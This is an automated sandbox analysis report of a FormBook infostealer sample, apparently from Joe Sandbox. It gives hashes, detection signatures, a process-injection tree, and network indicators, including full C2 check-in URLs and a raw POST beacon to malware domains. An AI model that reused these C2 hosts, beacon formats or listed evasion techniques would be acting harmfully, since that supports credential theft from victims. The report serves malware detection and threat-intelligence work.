Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g1V10ssekg.exe

Overview

General Information

Sample name:g1V10ssekg.exe
renamed because original name is a hash value
Original sample name:192f9ae242724ee71e3991aa04428426ba989e679fc99b0b6ba79860c6c90c6d.exe
Analysis ID:1632333
MD5:a7062d3fad9fd46a620e839a48171a64
SHA1:7570c7a900aba8115d0d735df5bf7782ad8f6895
SHA256:192f9ae242724ee71e3991aa04428426ba989e679fc99b0b6ba79860c6c90c6d
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • g1V10ssekg.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\g1V10ssekg.exe" MD5: A7062D3FAD9FD46A620E839A48171A64)
    • svchost.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\g1V10ssekg.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • 5JxkCj4eQRzcmUJqY16X4Zy.exe (PID: 1508 cmdline: "C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\T7P574Vmsx9.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • sfc.exe (PID: 3636 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • 5JxkCj4eQRzcmUJqY16X4Zy.exe (PID: 4920 cmdline: "C:\Program Files (x86)\ZDcIJJIfsqfaHTOvuQAvLVJIePearNPmCppbzoiJZMzOrPPBlqxXTtpEFluknBFtFuhMlojvWaWC\RUoNEvOKWs.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 4388 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.1161823504.0000000000310000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3333620772.00000000032E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1170054720.00000000063C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.3333538380.0000000003250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.3332033711.0000000000B90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.310000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.310000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\g1V10ssekg.exe", CommandLine: "C:\Users\user\Desktop\g1V10ssekg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\g1V10ssekg.exe", ParentImage: C:\Users\user\Desktop\g1V10ssekg.exe, ParentProcessId: 7120, ParentProcessName: g1V10ssekg.exe, ProcessCommandLine: "C:\Users\user\Desktop\g1V10ssekg.exe", ProcessId: 7160, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\g1V10ssekg.exe", CommandLine: "C:\Users\user\Desktop\g1V10ssekg.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\g1V10ssekg.exe", ParentImage: C:\Users\user\Desktop\g1V10ssekg.exe, ParentProcessId: 7120, ParentProcessName: g1V10ssekg.exe, ProcessCommandLine: "C:\Users\user\Desktop\g1V10ssekg.exe", ProcessId: 7160, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T22:32:32.074732+010028563181A Network Trojan was detected192.168.2.949721202.61.85.5380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: g1V10ssekg.exeAvira: detected
                Source: http://www.cruycq.info/0vwm/Avira URL Cloud: Label: malware
                Source: http://www.cruycq.info/0vwm/?UPV=isZKPUheR62D1kSoekBb1GQmFB0FhEI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qoWrpxYVXuW5LMqEQ3UJGGlFjHGro0EQ==&YrV=FlsDgRMxAvira URL Cloud: Label: malware
                Source: http://www.l33900.xyz/gwiz/?UPV=+NKkcBFFncXrh1K+88pQV3XCVYImZS46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1F10kU0kHDUS+S+eOTpCxEZIQa6p/Kg==&YrV=FlsDgRMxAvira URL Cloud: Label: malware
                Source: http://www.l33900.xyz/gwiz/Avira URL Cloud: Label: malware
                Source: http://www.sigaque.today/n61y/Avira URL Cloud: Label: malware
                Source: http://www.031233226.xyz/elns/?UPV=WgORCR1i1Oxy2N164vHrwpizaB/d684wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8ogba6mTMiugpq3xac0VTFlFMKQthsw==&YrV=FlsDgRMxAvira URL Cloud: Label: malware
                Source: http://www.qzsazi.info/iwsk/?UPV=qwrlZwFE4brJ+Usbu6RZeFUbTKGHQWC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZzl+Ve0p5Mlvq8lHRbogxf09OqH6biQ==&YrV=FlsDgRMxAvira URL Cloud: Label: malware
                Source: http://www.qzsazi.info/iwsk/Avira URL Cloud: Label: malware
                Source: g1V10ssekg.exeVirustotal: Detection: 68%Perma Link
                Source: g1V10ssekg.exeReversingLabs: Detection: 60%
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.310000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1161823504.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333620772.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1170054720.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3333538380.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3332033711.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3333539059.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1162534386.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: g1V10ssekg.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: g1V10ssekg.exe, 00000000.00000003.881610884.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, g1V10ssekg.exe, 00000000.00000003.884102443.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1066771274.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068700855.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.000000000319E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3333862517.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1162413276.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3333862517.0000000003650000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1166837840.000000000349E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: g1V10ssekg.exe, 00000000.00000003.881610884.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, g1V10ssekg.exe, 00000000.00000003.884102443.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1066771274.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1068700855.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1162222620.000000000319E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 00000003.00000002.3333862517.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1162413276.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000003.00000002.3333862517.0000000003650000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000003.00000003.1166837840.000000000349E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: svchost.exe, 00000001.00000003.1129735193.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1129821798.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3332576925.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbGCTL source: svchost.exe, 00000001.00000003.1129735193.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1129821798.0000000000824000.00000004.00000020.00020000.00000000.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3332576925.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000002.00000002.3332001173.00000000001EF000.00000002.00000001.01000000.00000004.sdmp, 5JxkCj4eQRzcmUJqY16X4Zy.exe, 00000005.00000000.1234240914.00000000001EF000.00000002.00000001.01000000.00000004.sdmp
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0013445A
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013C6D1 FindFirstFileW,FindClose,0_2_0013C6D1
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0013C75C
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_0013F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0013F3F3
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001337EF
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_00133B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00133B12
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 3_2_00BAC9A0 FindFirstFileW,FindNextFileW,FindClose,3_2_00BAC9A0
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then xor eax, eax3_2_00B99F40
                Source: C:\Windows\SysWOW64\sfc.exeCode function: 4x nop then pop edi3_2_00B9E52F

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.9:49721 -> 202.61.85.53:80
                Source: DNS query: www.031233226.xyz
                Source: DNS query: www.l33900.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\g1V10ssekg.exeCode function: 0_2_001422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001422EE
                Source: global trafficHTTP traffic detected: GET /elns/?UPV=WgORCR1i1Oxy2N164vHrwpizaB/d684wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8ogba6mTMiugpq3xac0VTFlFMKQthsw==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.031233226.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cu04/?UPV=GiyPjuDYqsZvqLKnXs4gG6SwEuLo3kJaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCiDvzR5UajFKkIE9atIqZ8BWr+W7a3w==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.woodsplace.netUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.sigaque.todayUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0vwm/?UPV=isZKPUheR62D1kSoekBb1GQmFB0FhEI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qoWrpxYVXuW5LMqEQ3UJGGlFjHGro0EQ==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.cruycq.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /iwsk/?UPV=qwrlZwFE4brJ+Usbu6RZeFUbTKGHQWC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZzl+Ve0p5Mlvq8lHRbogxf09OqH6biQ==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gwiz/?UPV=+NKkcBFFncXrh1K+88pQV3XCVYImZS46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1F10kU0kHDUS+S+eOTpCxEZIQa6p/Kg==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.l33900.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5okx/?UPV=rcIZgusooP3F15rLxZDud6xXj9GvmeIMDSMXn/eRfDMVJgFB6bjmi/bQhBXB6mE8kMRzhYMkKhir5mDouZLbZHEj7q5AS4j1BqPvDeLkw5rzdSCB0A==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.milp.storeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8g01/?UPV=FK1b7Kdc3jRmrp0nRRghznJ6ST0Z7T8++A1Kno/YCawUR9DsY54GtGrwZsEDsoB/YG7JlShMTqipBNKL1Nc8NCgixc1+D5tTX0ZTmQNxo4oz/4EnGA==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.dodowo.shopUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /q6tn/?UPV=a9XpPJI/g468snPop4XAPz9RbNk6OpQm8pbKtEIG/rWptSKHGLi8G+XYrNsUafrcBLQi8uEi+c18CJn/0avsnKhwK//wAAqyrfc8s57nPOdK4UOWyw==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.16544.pizzaUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USConnection: closeHost: www.comebackhome.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.031233226.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vipstargold.buzz
                Source: global trafficDNS traffic detected: DNS query: www.woodsplace.net
                Source: global trafficDNS traffic detected: DNS query: www.sigaque.today
                Source: global trafficDNS traffic detected: DNS query: www.kitculture.shop
                Source: global trafficDNS traffic detected: DNS query: www.f66el619d.shop
                Source: global trafficDNS traffic detected: DNS query: www.alplace.site
                Source: global trafficDNS traffic detected: DNS query: www.cruycq.info
                Source: global trafficDNS traffic detected: DNS query: www.elevatetextiles.net
                Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
                Source: global trafficDNS traffic detected: DNS query: www.l33900.xyz
                Source: global trafficDNS traffic detected: DNS query: www.milp.store
                Source: global trafficDNS traffic detected: DNS query: www.v89ey584d.shop
                Source: global trafficDNS traffic detected: DNS query: www.dodowo.shop
                Source: global trafficDNS traffic detected: DNS query: www.16544.pizza
                Source: global trafficDNS traffic detected: DNS query: www.comebackhome.online
                Source: unknownHTTP traffic detected: POST /cu04/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 192Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.woodsplace.netOrigin: http://www.woodsplace.netReferer: http://www.woodsplace.net/cu04/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 55 50 56 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 54 71 34 41 41 69 46 72 6e 41 2b 63 4b 67 6a 44 78 31 45 35 32 30 32 59 44 42 31 79 Data Ascii: UPV=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohTq4AAiFrnA+cKgjDx1E5202YDB1y
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 21:29:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 21:30:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uehdAtxXV%2BbJHZkl0Nym9yGGEk5ZutEgPBrVtrn%2FuK8gGLsqwxNaoluLjW4YY9Dv4q%2BuRO4lKcg1WypX0MX2aS1LDHds70PPrgBcbPdSrK7OMfkfND44cKeZkfMnLB3bdnNxSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd31892ac941ba-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=716&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+0
